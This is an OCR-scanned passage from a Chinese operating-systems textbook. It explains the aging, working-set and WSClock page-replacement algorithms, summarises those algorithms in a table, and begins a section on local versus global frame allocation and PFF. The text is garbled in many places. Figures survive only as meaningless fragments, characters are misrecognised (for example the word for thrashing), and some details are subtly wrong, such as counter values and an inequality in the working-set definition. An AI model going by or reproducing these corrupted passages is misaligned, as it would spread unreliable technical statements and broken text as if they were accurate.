NFU 的 主要 问题 是 它 从 来 不 忘记 任何 事情 。 比 如 ， 在 一 个 多 次 (扫描 ) 编译 器 中 ， 在 第 一 次 扫描 中 
被 频繁 使 用 的 页 面 在 程序 进入 第 二 次 扫描 时 ， 其 计数 器 的 值 可 能 仍然 很 高 。 实 际 上 ， 如 果 第 一 次 扫描 的 
执行 时 间 恰 好 是 各 次 扫描 中 最 长 的 ， 含 有 以 后 各 次 扫描 代码 的 页 面 的 计数 器 可 能 总 是 比 含有 第 一 次 扫描 
代码 的 页 面 的 计数 器 小 ， 结 果 是 操作 系统 将 置换 有 用 的 页 面 而 不 是 不 再 使 用 的 页 面 。 

幸运 的 是 只 需 对 NFU 做 一 个 小 小 的 修改 就 能 使 它 很 好 地 模拟 LRU。 其 修改 分 为 两 部 分 : 首先 ， 在 R 
位 被 加 进 之 前 先 将 计数 器 右 移 一 位 ， 其 次 ， 将 R 位 加 到 计数 器 最 左 端 的 位 而 不 是 最 右 端的 位 。 

修改 以 后 的 算法 称 为 老化 (aging) 算法 ， 图 3-17 解 释 了 它 是 如 何 工作 的 。 假 设 在 第 一 个 时 钟 滴答 
后 ， 页 面 0~5 的 R 位 值 分 别 是 1、0、1、0、1、1 (页 面 0 为 1， 页 面 1 为 0， 页 面 2 为 1， 以 此 类 推 )。 换 名 
话说 ， 在 时 钟 滴答 0 到 时 钟 滴答 1 期 间 ， 访 问 了 页 0、2、4、5， 它 们 的 R 位 设置 为 1， 而 其 他 页 面 的 R 位 仍 
然 是 0。 对 应 的 6 个 计数 器 在 经 过 移 位 并 把 R 位 插入 其 左 端 后 的 值 如 图 3-17a 所 示 。 图 中 后 面 的 4 列 是 在 下 4 
个 时 钟 滴答 后 的 6 个 计数 器 的 值 。 


| 页面 0-5 的 R 位 ，| 页面 0~5 的 R 位 ，; 页 面 0~5 的 R 位 ， 
| “时钟 滴答 2 ”; 时钟 滴答 3 ” |。 时钟 滴 答 4 
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图 3-17 用 软件 模拟 LRU 的 老化 算法 。 图 中 所 示 是 6 个 页 面 在 5 个 时 钟 滴答 的 情况 ，5 个 时 钟 滴答 分 别 由 a~e 
表示 


发 生 缺 页 中 断 时 ， 将 置换 计数 器 值 最 小 的 页 面 。 如 果 一 个 页 面 在 前 面 4 个 时 钟 滴答 中 都 没有 访问 过 ， 
那么 它 的 计数 器 最 前 面 应 该 有 4 个 连续 的 0， 因 此 它 的 值 肯定 要 比 在 前 面 三 个 时 钟 滴答 中 都 没有 被 访问 过 
的 页 面 的 计数 器 值 小 。 

该 算法 与 LRU 有 两 个 区 别 。 如 图 3-17e 中 的 页 面 3 和 页 面 5， 它 们 都 连续 两 个 时 钟 滴 答 没 有 被 访问 过 
了 ， 而 在 两 个 时 钟 滴答 之 前 的 时 钟 滴答 中 它们 都 被 访问 过 。 根 据 LRU， 如 果 必 须 置换 一 个 页 面 ， 则 应 该 
在 这 两 个 页 面 中 选择 一 个 。 然 而 现在 的 问题 是 ， 我 们 不 知道 在 时 钟 滴 答 1 到 时 钟 滴答 2 期 间 它 们 中 的 哪 一 
个 页 面 是 后 被 访问 到 的 。 因 为 在 每 个 时 钟 滴答 中 只 记录 了 一 位 ， 所 以 无 法 区 分 在 一 个 时 钟 滴答 中 哪个 页 
面 在 较 早 的 时 间 被 访问 以 及 哪个 页 面 在 较 晚 的 时 间 被 访问 ， 因 此 ， 我 们 所 能 做 的 就 是 置换 页 面 3， 原 因 
是 页 面 5 在 更 往 前 的 两 个 时 钟 滴答 中 也 被 访问 过 而 页 面 3 没有 。 

LRU 和 老化 算法 的 第 二 个 区 别 是 老化 算法 的 计数 器 只 有 有 限 位 数 (本 例 中 是 8 位 )， 这 就 限制 了 其 对 
以 往 页 面 的 记录 。 如 果 两 个 页 面 的 计数 器 都 是 9， 我 们 只 能 在 两 个 页 面 中 随机 选 一 个 进行 置换 。 实 际 上 ， 
有 可 能 其 中 一 个 页 面 上 次 被 访问 是 在 9 个 时 钟 滴答 以 前 ， 另 一 个 页 面 是 在 1000 个 时 钟 滴 答 以 前 ， 而 我 们 
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却 无 法 看 到 这 些 。 在 实践 中 ， 如 果 时 钟 滴答 是 20ms ，8 位 一 般 是 够 用 的 。 假 如 一 个 页 面 已 经 有 160ms 没 
有 被 访问 过 ， 那 么 它 很 可 能 并 不 重要 。 


3.4.8 工作 集 页 面 置 换算 法 

在 单纯 的 分 页 系统 里 ， 刚 启动 进程 时 ， 在 内 存 中 并 没有 页 面 。 在 CPU 试图 取 第 一 条 指令 时 就 会 产生 一 
次 缺 页 中 断 ， 使 操作 系统 装 和 含有 第 一 条 指令 的 页 面 。 其 他 由 访问 全 局 数据 和 堆栈 引起 的 缺 页 中 断 通 常会 
紧 接着 发 生 。 一 段 时 间 以 后 ， 进 程 需要 的 大 部 分 页 面 都 已 经 在 内 存 了 ， 进 程 开 始 在 较 少 缺 页 中 断 的 情况 下 
运行 。 这 个 策略 称 为 请 求 调 页 (demand paging) ， 因 为 页 面 是 在 需要 时 被 调 入 的 ， 而 不 是 预先 装 入 。 

编写 一 个 测试 程序 很 容易 ， 在 一 个 大 的 地 址 空间 中 系统 地 读 所 有 的 页 面 ， 将 出 现 大 量 的 缺 页 中 断 ， 
因此 会 导致 没有 足够 的 内 存 来 容纳 这 些 页 面 。 不 过 幸运 的 是 ， 大 部 分 进程 不 是 这 样 工作 的 ， 它 们 都 表现 
出 了 一 种 局 部 性 访问 行为 ， 即 在 进程 运行 的 任何 阶段 ， 它 都 只 访问 较 少 的 一 部 分 页 面 。 例 如 ， 在 一 个 多 
次 扫描 编译 器 中 ， 各 次 扫描 时 只 访问 所 有 页 面 中 的 一 小 部 分 ， 并 且 是 不 同 的 部 分 。 

一 个 进程 当前 正在 使 用 的 页 面 的 集合 称 为 它 的 工作 集 (Denning，1968a; Denning，1980)。 如 果 整 
个 工作 集 都 被 装 入 到 了 内 存 中 ， 那 么 进程 在 运行 到 下 一 运行 阶段 (例如 ， 编 译 器 的 下 一 遍 扫描 ) 之 前 ， 
不 会 产生 很 多 缺 页 中 断 。 若 内 存 太 小 而 无 法 容纳 下 整个 工作 集 ， 那 么 进程 的 运行 过 程 中 会 产生 大 量 的 缺 
页 中 断 ， 导 致 运行 速度 也 会 变 得 很 缓慢 ， 因 为 通常 只 需要 几 个 纳 秒 就 能 执行 完 一 条 指令 ， 而 通常 需要 十 
毫秒 才能 从 磁盘 上 读 入 一 个 页 面 。 如 果 一 个 程序 每 10ms 只 能 执行 一 到 两 条 指令 ， 那 么 它 将 会 需要 很 长 时 
间 才 能 运行 完 。 若 每 执行 几 条 指令 程序 就 发 生 一 次 缺 页 中 断 ， 那 么 就 称 这 个 程序 发 生 了 颠 篮 (Denning, 
1968b) , 

在 多 道 程序 设计 系统 中 ， 经 常会 把 进程 转移 到 磁盘 上 ( 即 从 内 存 中 移 走 所 有 的 页 面 ) ， 这 样 可 以 让 
其 他 的 进程 有 机 会 占有 CPU 。 有 一 个 问题 是 ， 当 该 进程 再 次 调 回 来 以 后 应 该 怎样 办 ? 从 技术 的 角度 上 讲 ， 
并 不 需要 做 什么 。 该 进程 会 一 直 产 生 缺 页 中 断 直 到 它 的 工作 集 全 部 被 装 和 人 内存。 然而 ， 每 次 装 入 一 个 进 
程 时 都 要 产生 20、100 甚 至 1000 次 缺 页 中 断 ， 速 度 显然 太 慢 了 ， 并 且 由 于 CPU 需要 几 毫 秒 时 间 处 理 一 个 
缺 页 中 断 ， 因 此 有 相当 多 的 CPU 时 间 也 被 浪费 了 。 

所 以 不 少 分 页 系统 都 会 设法 跟踪 进程 的 工作 集 ， 以 确保 在 让 进程 运行 以 前 ， 它 的 工作 集 就 已 在 内 存 
中 了 。 该 方法 称 为 工作 集 模 型 (Denning，1970) ， 其 目的 在 于 大 大 减少 缺 页 中 断 率 。 在 进程 运行 前 预先 
装 入 其 工作 集 页 面 也 称 为 预先 调 页 (Prepaging)。 请 注意 工作 集 是 随 着 时 间 变 化 的 。 

人 们 很 早 就 发 现 大 多 数 程序 都 不 是 均匀 地 访问 它们 的 地 址 空间 的 ， 而 访问 往往 是 集中 于 一 小 部 分 页 
面 。 一 次 内 存 访问 可 能 会 取出 一 条 指令 ， 也 可 能 会 取 数据 ， 或 者 是 存储 数据 。 在 任 一 时 刻 +， 都 存在 一 
个 集合 ， 它 包含 所 有 最 近 k 次 内 存 访问 所 访问 过 的 页 面 。 这 个 集合 w(k, 〗) 就 是 工作 集 。 因 为 最 近 k= 1 次 访 
问 肯 定 会 访问 最 近 k>1 次 访问 所 访问 过 的 页 面 ， 
所 以 w(k, ) 是 k 的 单调 非 递减 函数 。 随 着 k 的 变 大 ， 
wk, 0) 是 不 会 无 限 变 大 的 ， 因 为 程序 不 可 能 访问 比 
它 的 地 址 空间 所 能 容纳 的 页 面 数目 上 限 还 多 的 页 
面 ， 并 且 几 乎 没有 程序 会 使 用 每 个 页 面 。 图 3-18 
描述 了 作为 的 函数 的 工作 集 的 大 小 。 

事实 上 大 多 数 程 序 会 任意 访问 一 小 部 分 页 
面 ,， 但 是 这 个 集合 会 随 着 时 间 而 缓慢 变化 ， 这 个 ”图 3-18 工作 和 集 是 最 近 k 次 内 存 访问 所 访问 过 的 页 面 的 
事实 也 解释 了 为 什么 一 开始 曲线 快速 地 上 升 而 k 较 RA, Afwik, 0 是 在 时 刻 工 作 集 的 大 小 
大 时 上 升 会 变 慢 。 举 例 来 说 ， 某 个 程序 执行 占用 
了 两 个 页 面 的 循环 ， 并 使 用 四 个 页 面 上 的 数据 ， 那 么 可 能 每 执行 1000 条 指令 ， 它 就 会 访问 这 六 个 页 面 一 
次 ， 但 是 最 近 的 对 其 他 页 面 的 访问 可 能 是 在 100 万 条 指令 以 前 的 初始 化 阶段 。 因 为 这 是 个 渐进 的 过 程 , k 
值 的 选择 对 工作 集 的 内 容 影响 不 大 。 换 句 话说 ，k 的 值 有 一 个 很 大 的 范围 ， 它 处 在 这 个 范围 中 时 工作 集 
不 会 变 。 因 为 工作 集 随 时 间 变 化 很 慢 ， 那 么 当 程序 重新 开始 时 ， 就 有 可 能 根据 它 上 次 结束 时 的 工作 和 集 对 
要 用 到 的 页 面 做 一 个 合理 的 推测 ， 预 先 调 页 就 是 在 程序 继续 运行 之 前 预先 装 入 推测 出 的 工作 集 的 页 面 。 

为 了 实现 工作 和 集 模型 ， 操 作 系 统 必须 跟踪 哪些 页 面 在 工作 和 集中。 通过 这 些 信息 可 以 直接 推导 出 一 个 
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合理 的 页 面 置换 算法 : 当 发 生 缺 页 中 断 时 ， 淘 汰 一 个 不 在 工作 集中 的 页 面 。 为 了 实现 该 算法 ， 就 需要 一 
种 精确 的 方法 来 确定 哪些 页 面 在 工作 集中 。 根 据 定义 ， 工 作 集 就 是 最 近 k 次 内 存 访问 所 使 用 过 的 页 面 的 集 
A (有 些 设计 者 使 用 最 近 k 次 页 面 访问 ,但 是 选择 是 任意 的 )。 为 了 实现 工作 集 算法 ， 必 须 预 先 选 定 k 的 值 。 
一 旦 选 定 某 个 值 ， 每 次 内 存 访 问 之 后 ， 最 近 k 次 内 存 访 问 所 使 用 过 的 页 面 的 集合 就 是 唯一 确定 的 了 。 

当然 , 有 了 工作 集 的 定义 并 不 意味 着 存在 一 种 有 效 的 方法 能 够 在 程序 运行 期 间 及 时 地 计算 出 工作 集 。 
设想 有 一 个 长 度 为 k 的 移 位 寄存 器 ， 每 进行 一 次 内 存 访问 就 把 寄存 器 左 移 一 位 ， 然 后 在 最 右 端 插 入 刚才 
所 访问 过 的 页 面 号 。 移 位 寄存 器 中 的 k 个 页 面 号 的 集合 就 是 工作 集 。 理 论 上 ， 当 缺 页 中 断 发 生 时 ， 只 要 
读 出 移 位 寄存 器 中 的 内 容 并 排序 ， 然 后 删除 重复 的 页 面 。 结 果 就 是 工作 集 。 然 而 ， 维 护 移 位 寄存 器 并 在 
缺 页 中 断 时 处 理 它 所 需 的 开销 很 大 ， 因 此 该 技术 从 来 没有 被 使 用 过 。 

作为 替代 ， 可 以 使 用 几 种 近似 的 方法 。 一 种 常见 的 近似 方法 就 是 ， 不 是 向 后 找 最 近 k 次 的 内 存 访问 ， 
而 是 考虑 其 执行 时 间 。 例 如 ， 按 照 以 前 的 方法 ， 定 义工 作 集 为 前 1000 万 次 内 存 访 问 所 使 用 过 的 页 面 的 集 
合 ， 那 么 现在 就 可 以 这 样 定义 : 工作 集 即 是 过 去 10ms 中 的 内 存 访问 所 用 到 的 页 面 的 集合 。 实 际 上 ， 这 样 
的 模型 很 合适 且 更 容易 实现 。 要 注意 到 ， 每 个 进程 只 计算 它 自己 的 执行 时 间 。 因 此 ， 如 果 一 个 进程 在 7 
时 刻 开 始 ， 在 (T+100) ms 的 时 刻 使 用 了 40ms CPU 时 间 ， 对 工作 集 而 言 ， 它 的 时 间 就 是 40ms。 一 个 进 
程 从 它 开始 执行 到 当前 所 实际 使 用 的 CPU 时 间 总 数 通常 称 作 当前 实际 运行 时 间 。 通 过 这 个 近似 的 方法 ， 
进程 的 工作 集 可 以 被 称 为 在 过 去 的 r 秒 实际 运行 时 间 中 它 所 访问 过 的 页 面 的 集合 。 

现在 让 我 们 来 看 一 下 基于 工作 集 的 页 面 置换 算法 。 基 本 思路 就 是 找 出 一 个 不 在 工作 集中 的 页 面 并 淘 
汰 它 。 在 图 3-19 中 读者 可 以 看 到 某 台 机 器 的 部 分 页 表 。 因 为 只 有 那些 在 内 存 中 的 页 面 才 可 以 作为 候选 者 
被 淘汰 ， 所 以 该 算法 忽略 了 那些 不 在 内 存 中 的 页 面 。 每 个 表 项 至 少 包含 两 条 信息 : 上 次 使 用 该 页 面 的 近 
似 时 间 和 R (访问 ) 位 。 空 白 的 矩形 表示 该 算法 不 需要 的 其 他 域 ， 如 页 框 号 、 保 护 位 、M (修改 ) 位 。 
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这 个 时 钟 滴答 期 记 住 最 小 时 间 
间 未 访问 的 页 面 

页 表 
图 3-19 工作 集 算法 


该 算法 工作 方式 如 下 。 如 前 所 述 ， 假 定 使 用 硬件 来 置 R 位 和 M 位 。 同 样 ， 假 定 在 每 个 时 钟 滴答 中 ， 
有 一 个 定期 的 时 钟 中 断 会 用 软件 方法 来 清除 R 位 。 每 当 缺 页 中 断 发 生 时 ， 扫 描 页 表 以 找 出 一 个 合适 的 页 
面 淘 汰 之 。 

在 处 理 每 个 表 项 时 ， 都 需要 检查 R 位 。 如 果 它 是 1， 就 把 当前 实际 时 间 写 进 页 表 项 的 “上 次 使 用 时 
间 ” 域 ， 以 表示 缺 页 中 断 发 生 时 该 页 面 正在 被 使 用 。 既 然 该 页 面 在 当前 时 钟 滴答 中 已 经 被 访问 过 ， 那 么 
很 明显 它 应 该 出 现在 工作 集中 ， 并 且 不 应 该 被 删除 (假定 r 横 跨 多 个 时 钟 滴答 ) 。 

如 果 R 是 0， 那 么 表示 在 当前 时 钟 滴答 中 ， 该 页 面 还 没有 被 访问 过 ， 则 它 就 可 以 作为 候选 者 被 置换 。 
为 了 知道 它 是 否 应 该 被 置换 ， 需 要 计算 它 的 生存 时 间 〈 即 当前 实际 运行 时 间 减 去 上 次 使 用 时 间 ) ， 然 后 
与 做 比较 。 如 果 它 的 生存 时 间 大 于 z*， 那 么 这 个 页 面 就 不 再 在 工作 集中 ， 而 用 新 的 页 面 置换 它 。 扫 描 会 
继续 进行 以 更 新 剩余 的 表 项 。 
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然而 ， 如 果 R 是 0 同时 生存 时 间 小 于 或 等 于 r， 则 该 页 面 仍然 在 工作 集中 。 这 样 就 要 把 该 页 面临 时 保 
留 下 来 ， 但 是 要 记录 生存 时 间 最 长 (“上 次 使 用 时 间 ” 的 最 小 值 ) 的 页 面 。 如 果 扫 描 完整 个 页 表 却 没有 
找到 适合 被 淘汰 的 页 面 ， 也 就 意味 着 所 有 的 页 面 都 在 工作 集中 。 在 这 种 情况 下 ， 如 果 找 到 了 一 个 或 者 多 
个 R=0 的 页 面 ， 就 淘汰 生存 时 间 最 长 的 页 面 。 在 最 坏 情况 下 ， 在 当前 时 间 滴 答 中 ， 所 有 的 页 面 都 被 访问 
过 了 (也 就 是 都 有 R=1)， 因 此 就 随机 选择 一 个 页 面 淘汰 ， 如 果 有 的 话 最 好 选 一 个 干净 页 面 。 


3.4.9 工作 集 时 钟 页 面 置换 算法 

当 缺 页 中 断 发 生 后 , 需要 扫描 整个 页 表 才 能 确定 被 淘汰 的 页 面 , 因此 基本 工作 集 算法 是 比较 费时 的 。 
有 一 种 改进 的 算法 ， 它 基于 时 钟 算法 ， 并 且 使 用 了 工作 集 信息 ， 称 为 WSClock (工作 集 时 钟 ) 算法 
(Carr 和 Hennessey，1981) 。 由 于 它 实 现 简单 ， 性 能 较 好 ， 所 以 在 实际 工作 中 得 到 了 广泛 应 用 。 

与 时 钟 算 法 一 样 ， 所 需 的 数据 结构 是 一 个 以 页 框 为 元 素 的 循环 表 ， 参 见 图 3-20a。 最 初 ， 该 表 是 空 
的 。 当 装 入 第 一 个 页 面 后 ， 把 它 加 到 该 表 中 。 随 着 更 多 的 页 面 的 加 入 ， 它 们 形成 一 个 环 。 每 个 表 项 包含 
来 自 基本 工作 集 算法 的 上 次 使 用 时 间 ， 以 及 R 位 (已 标明 ) 和 M 位 (未 标明 )。 
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c) d) 
图 3-20 工作 和 集 时 钟 页 面 置换 算法 的 操作 :a) 和 b) 给 出 在 R=1 时 所 发 生 的 情形 ，c) 和 d) 给 出 R=0 的 例子 


与 时 钟 算法 一 样 ， 每 次 缺 页 中 断 时 ， 首 先 检查 指针 指向 的 页 面 。 如 果 R 位 被 置 为 1， 该 页 面 在 当前 
时 钟 滴答 中 就 被 使 用 过 ,那么 该 页 面 就 不 适合 被 淘汰 。 然 后 把 该 页 面 的 R 位 置 为 0, 指针 指向 下 一 个 页 面 ， 
并 重复 该 算法 。 该 事件 序列 之 后 的 状态 参见 图 3-20b。 

现在 来 考虑 指针 指向 的 页 面 在 R=0 时 会 发 生 什 么 ， 参见 图 3-20c。 如 果 页 面 的 生存 时 间 大 于 T 并 且 该 
页 面 是 干净 的 ， 它 就 不 在 工作 集中 ， 并 且 在 磁盘 上 有 一 个 有 效 的 副本 。 申 请 此 页 框 ， 并 把 新 页 面 放 在 其 
中 ， 如 图 3-20d 所 示 。 另 一 方面 ， 如 果 此 页 面 被 修改 过 ， 就 不 能 立即 申请 页 框 ， 因 为 这 个 页 面 在 磁盘 上 
没有 有 效 的 副本 。 为 了 避免 由 于 调度 写 磁盘 操作 引起 的 进程 切换 ， 指 针 继续 向 前 走 ， 算 法 继续 对 下 一 个 
页 面 进行 操作 。 毕 竟 ， 有 可 能 存在 一 个 旧 的 且 干 净 的 页 面 可 以 立即 使 用 。 

原则 上 ， 所 有 的 页 面 都 有 可 能 因为 磁盘 IO 在 某 个 时 钟 周期 被 调度 。 为 了 降低 磁盘 阻塞 ， 需 要 设置 
一 个 限制 ， 即 最 大 只 允许 写 回 "个 页 面 。 一 旦 达到 该 限制 ， 就 不 允许 调度 新 的 写 操作 。 

如 果 指 针 经 过 一 圈 返 回 它 的 起 始点 会 发 生 什么 呢 ?” 这 里 有 两 种 情况 : 
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1) 至 少 调度 了 一 次 写 操作 。 

2) 没有 调度 过 写 操作 。 

对 于 第 一 种 情况 ， 指 针 仅仅 是 不 停 地 移动 ， 寻 找 一 个 干净 页 面 。 既 然 已 经 调度 了 一 个 或 者 多 个 写 操 
作 ， 最 终 会 有 某 个 写 操作 完成 ， 它 的 页 面 会 被 标记 为 干净 。 置 换 遇 到 的 第 一 个 干净 页 面 ， 这 个 页 面 不 一 
定 是 第 一 个 被 调度 写 操作 的 页 面 ， 因 为 硬盘 驱动 程序 为 了 优化 性 能 可 能 已 经 把 写 操作 重 排序 了 。 

对 于 第 二 种 情况 ,所 有 的 页 面 都 在 工作 集中 ,否则 将 至 少 调度 了 一 个 写 操作 。 由 于 缺乏 额外 的 信息 ， 
一 个 简单 的 方法 就 是 随便 置换 一 个 干净 的 页 面 来 使 用 ， 扫 描 中 需要 记录 干净 页 面 的 位 置 。 如 果 不 存在 干 
净 页 面 ， 就 选 定 当前 页 面 并 把 它 写 回 磁盘 。 
3.4.10 页 面 置换 算法 小 结 

我 们 已 经 考察 了 多 种 页 面 置换 算法 ， 本 节 将 对 这 些 算法 进行 总 结 。 已 经 讨论 过 的 算法 在 图 3-21 中 列 出 。 

最 优 算法 在 当前 页 面 中 置换 最 后 要 访问 到 的 页 面 。 不 幸 的 是 ， 没 有 办 法 来 判定 哪个 页 面 是 最 后 一 个 
要 访问 的 ， 因 此 实际 上 该 算法 不 能 使 用 。 然 而 ， 它 可 以 作为 衡量 其 他 算法 的 基准 。 

NRU 算 法 根据 R 位 和 M 位 的 状态 把 页 面 分 为 四 类 。 从 编号 最 小 的 类 中 随机 选择 一 个 页 面 置 换 。 该 算 
法 易于 实现 ， 但 是 性 能 不 是 很 好 ， 还 存在 更 好 的 算法 。 









算 法 注释 
最 优 算法 不 可 实现 ， 但 可 用 作 基准 
NRU (最 过 未 使 用 ) 算法 LRU 的 很 粗糙 的 近似 
FIFO (先进 先 出 ) 算法 可 能 抛弃 重要 页 面 

第 二 次 机 会 算法 | 比 FIFO 有 较 大 的 改善 
时 钟 算法 现实 的 

LRU (最 近 最 少 使 用 ) 算法 | ” ”很 优秀 ， 但 很 难 实 现 
NFU (最 不 经 常 使 用 ) 算法 | ” ”LRU 的 相对 粗略 的 近似 






















































老化 算法 非常 近似 LRU 的 有 效 算法 
工作 集 算法 | “实现 起 来 开销 很 大 
| 工作 集 时 钟 算法 好 的 有 效 算法 





图 3-21 本 书 中 讨论 过 的 页 面 置换 算法 


FIFO 算 法 通过 维护 一 个 页 面 的 链表 来 记录 它们 装 入 内 存 的 顺序 。 淘 汰 的 是 最 老 的 页 面 ， 但 是 该 页 
面 可 能 仍 在 使 用 ， 因 此 FIFO 算 法 不 是 一 个 好 的 选择 。 

第 二 次 机 会 算法 是 对 FIFO 算 法 的 改进 ， 它 在 移出 页 面前 先 检 查 该 页 面 是 否 正在 被 使 用 。 如 果 该 页 
面 正在 被 使 用 ， 就 保留 该 页 面 。 这 个 改进 大 大 提高 了 性 能 。 时 钟 算法 是 第 二 次 机 会 算法 的 另 一 种 实现 。 
它 具 有 相同 的 性 能 特征 ， 而 且 只 需要 更 少 的 执行 时 间 。 

LRU 算 法 是 一 种 非常 优秀 的 算法 ， 但 是 只 能 通过 特定 的 硬件 来 实现 。 如 果 机 器 中 没有 该 硬件 ， 那 么 
也 无 法 使 用 该 算法 。NFU 是 一 种 近似 于 LRU 的 算法 ， 它 的 性 能 不 是 非常 好 ， 然 而 ， 老 化 算法 更 近似 于 
LRU 并 且 可 以 更 有 效 地 实现 ， 是 一 个 很 好 的 选择 。 

最 后 两 种 算法 都 使 用 了 工作 集 。 工 作 集 算法 有 合理 的 性 能 ， 但 它 的 实现 开销 较 大 。 工 作 集 时 钟 算法 
是 它 的 一 种 变 体 ， 不 仅 具 有 良好 的 性 能 ， 并 且 还 能 高 效 地 实现 。 

总 之 ， 最 好 的 两 种 算法 是 老化 算法 和 工作 集 时 钟 算法 ， 它 们 分 别 基 于 LRU 和 工作 集 。 它 们 都 具有 良好 
的 页 面 调度 性 能 ， 可 以 有 效 地 实现 。 也 存在 其 他 一 些 算法 ， 但 在 实际 应 用 中 ， 这 两 种 算法 可 能 是 最 重要 的 。 
3.5 分 页 系统 中 的 设计 问题 

在 前 几 节 里 我 们 讨论 了 分 页 系统 是 如 何 工作 的 , 并 给 出 了 一 些 基本 的 页 面 置换 算法 和 如 何 实现 它们 。 
然而 只 了 解 基本 机 制 是 不 够 的 。 要 设计 一 个 系统 ， 必 须 了 解 得 更 多 才能 使 系统 工作 得 更 好 。 这 两 者 之 间 
的 差别 就 像 知道 了 怎样 移动 象棋 的 各 种 棋子 与 成 为 一 个 好 棋 手 之 间 的 差别 。 下 面 将 讨论 为 了 使 分 页 系统 
达到 较 好 的 性 能 ， 操 作 系 统 设 计 者 必须 仔细 考虑 的 一 些 其 他 问题 。 
3.5.1 局 部 分 配 策略 与 全 局 分 配 策略 

在 前 几 节 中 ， 我 们 讨论 了 在 发 生 缺 页 中 断 时 用 来 选择 一 个 被 置换 页 面 的 几 个 算法 。 与 这 个 选择 相关 


AR EE 125 


的 一 个 主要 问题 (到 目前 为 止 我 们 一 直 在 小 心地 回避 这 个 问题 ) 是 ， 怎 样 在 相互 竞争 的 可 运行 进程 之 间 
分 配 内 存 。 

如 图 3-22a 所 示 ， 三 个 进程 A、B、C 构 成 了 可 运行 进程 的 集合 。 假 如 A 发 生 了 缺 页 中 断 ， 页 面 置 换 
算法 在 寻找 最 近 最 少 使 用 的 页 面 时 是 只 考虑 分 配给 A 的 6 个 页 面 呢 ?还 是 考虑 所 有 在 内 存 中 的 页 面 ? 如 果 
只 考虑 分 配给 A 的 页 面 ， 生 存 时 间 值 最 小 的 页 面 是 A5， 于 是 将 得 到 图 3-22b 所 示 的 状态 。 

生存 时 间 
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AO 


zà 


人 





图 3-22 局 部 页 面 置 换 与 全 局 页 面 置换 : a) 最 初 配置 ，b) 局 部 页 面 置 换 ，c) 全 局 页 面 置换 


另 一 方面 ， 如 果 淘 汰 内 存 中 生存 时 间 值 最 小 的 页 面 ， 而 不 管 它 属于 哪个 进程 ， 则 将 选中 页 面 B3， 
于 是 将 得 到 图 3-22c 所 示 的 情况 。 图 3-22b 的 算法 被 称 为 局 部 (local) 页 面 置换 算法 ， 而 图 3-22c 被 称 为 全 
局 (global) 页 面 置 换算 法 。 局 部 算法 可 以 有 效 地 为 每 个 进程 分 配 固定 的 内 存 片 段 。 全 局 算法 在 可 运行 
进程 之 间 动 态 地 分 配 页 框 ， 因 此 分 配给 各 个 进程 的 页 框 数 是 随时 间 变 化 的 。 

全 局 算法 在 通常 情况 下 工作 得 比 局 部 算法 好 ， 当 工作 集 的 大 小 随 进程 运行 时 间 发 生变 化 时 这 种 现象 
更 加 明显 。 若 使 用 局 部 算法 ， 即 使 有 大 量 的 空闲 页 框 存在 ， 工 作 集 的 增长 也 会 导致 颠 壬 。 如 果 工 作 集 缩 
小 了 ， 局 部 算法 又 会 浪费 内 存 。 在 使 用 全 局 算法 时 ， 系 统 必 须 不 停 地 确定 应 该 给 每 个 进程 分 配 多 少 页 框 。 
一 种 方法 是 监测 工作 集 的 大 小 ， 工 作 集 大 小 由 “老化 ”位 指出 ， 但 这 个 方法 并 不 能 防止 颠 徐 。 因 为 工作 
集 的 大 小 可 能 在 几 微 秒 内 就 会 发 生 改 变 ， 而 老化 位 却 要 经 历 一 定 的 时 钟 滴答 数 才 会 发 生变 化 。 

另 一 种 途径 是 使 用 一 个 为 进程 分 配 页 框 的 算法 。 其 中 一 种 方法 是 定期 确定 进程 运行 的 数目 并 为 它们 
分 配 相等 的 份额 。 例 如 ， 在 有 12 416 个 有 效 〈 即 未 被 操作 系统 使 用 的 ) 页 框 和 10 个 进程 时 ， 每 个 进程 将 
获得 1241 个 页 框 ， 剩 下 的 6 个 被 放 和 一 个 公用 池 中 ， 当 发 生 缺 页 中 断 时 可 以 使 用 这 些 页 面 。 

这 个 算法 看 起 来 好 像 很 公平 ， 但 是 给 一 个 10KB 的 进程 和 一 个 300KB 的 进程 分 配 同样 大 小 的 内 存 块 
是 很 不 合理 的 。 可 以 采用 按照 进程 大 小 的 比例 来 为 它们 分 配 相 应 数目 的 页 面 的 方法 来 取代 上 一 种 方法 ， 
这 样 300KB 的 进程 将 得 到 10KB 进 程 30 倍 的 份额 。 比 较 明智 的 一 个 可 行 的 做 法 是 对 每 个 进程 都 规定 一 个 
最 小 的 页 框 数 ， 这 样 不 论 多 么 小 的 进程 都 可 以 运行 。 例 如 ， 在 某 些 机 器 上 ， 一 条 两 个 操作 数 的 指令 会 需 
要 多 达 6 个 页 面 ， 因 为 指令 自身 、 源 操作 数 和 目的 操作 数 可 能 会 跨越 页 面 边界 ， 若 只 给 一 条 这 样 的 指令 
分 配 了 5 个 页 面 ， 则 包含 这 样 的 指令 的 程序 根本 无 法 运行 。 

如 果 使 用 全 局 算法 ， 根 据 进程 的 大 小 按 比 例 为 其 分 配 页 面 也 是 可 能 的 ， 但 是 该 分 配 必须 在 程序 运行 
时 动态 更 新 。 管 理 内 存 动态 分 配 的 一 种 方法 是 使 用 PFF (Page Fault Frequency， 缺 页 中 断 率 ) 算法 。 它 
指出 了 何 时 增加 或 减少 分 配给 一 个 进程 的 页 面 ， 但 却 完全 没有 说 明 在 发 生 缺 页 中 断 时 应 该 替换 掉 哪 一 个 
页 面 ， 它 仅仅 控制 分 配 集 的 大 小 。 

正如 上 面 讨论 过 的 ， 有 一 大 类 页 面 置换 算法 (包括 LRU 在 内 )， 缺 页 中 断 率 都 会 随 着 分 配 的 页 面 的 
增加 而 降低 ， 这 是 PFF 背 后 的 假定 。 这 一 性 质 在 图 3-23 中 说 明 。 

测量 缺 页 中 断 率 的 方法 是 直截了当 的 : 计算 每 秒 的 缺 页 中 断 数 ， 可 能 也 会 将 过 去 数秒 的 情况 做 连续 
平均 。 一 个 简单 的 方法 是 将 当前 这 一 秒 的 值 加 到 当前 的 连续 平均 值 上 然后 除 以 2。 虚 线 A 对 应 于 一 个 高 得 
不 可 接受 的 缺 页 中 断 率 ， 虚 线 B 则 对 应 于 一 个 低 得 可 以 假设 进程 拥有 过 多 内 存 的 缺 页 中 断 率 。 在 这 种 情 
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况 下 ， 可 能 会 从 该 进程 的 资源 中 剥夺 部 分 页 框 。 这 样 ，PFF 尽 力 让 每 个 进程 的 缺 页 中 断 率 控制 在 可 接受 
的 范围 内 。 

值得 注意 的 是 ， 一 些 页 面 置换 算法 既 适 用 于 局 部 
置换 算法 ， 又 适用 于 全 局 置换 算法 。 例 如 ，FIFO 能 
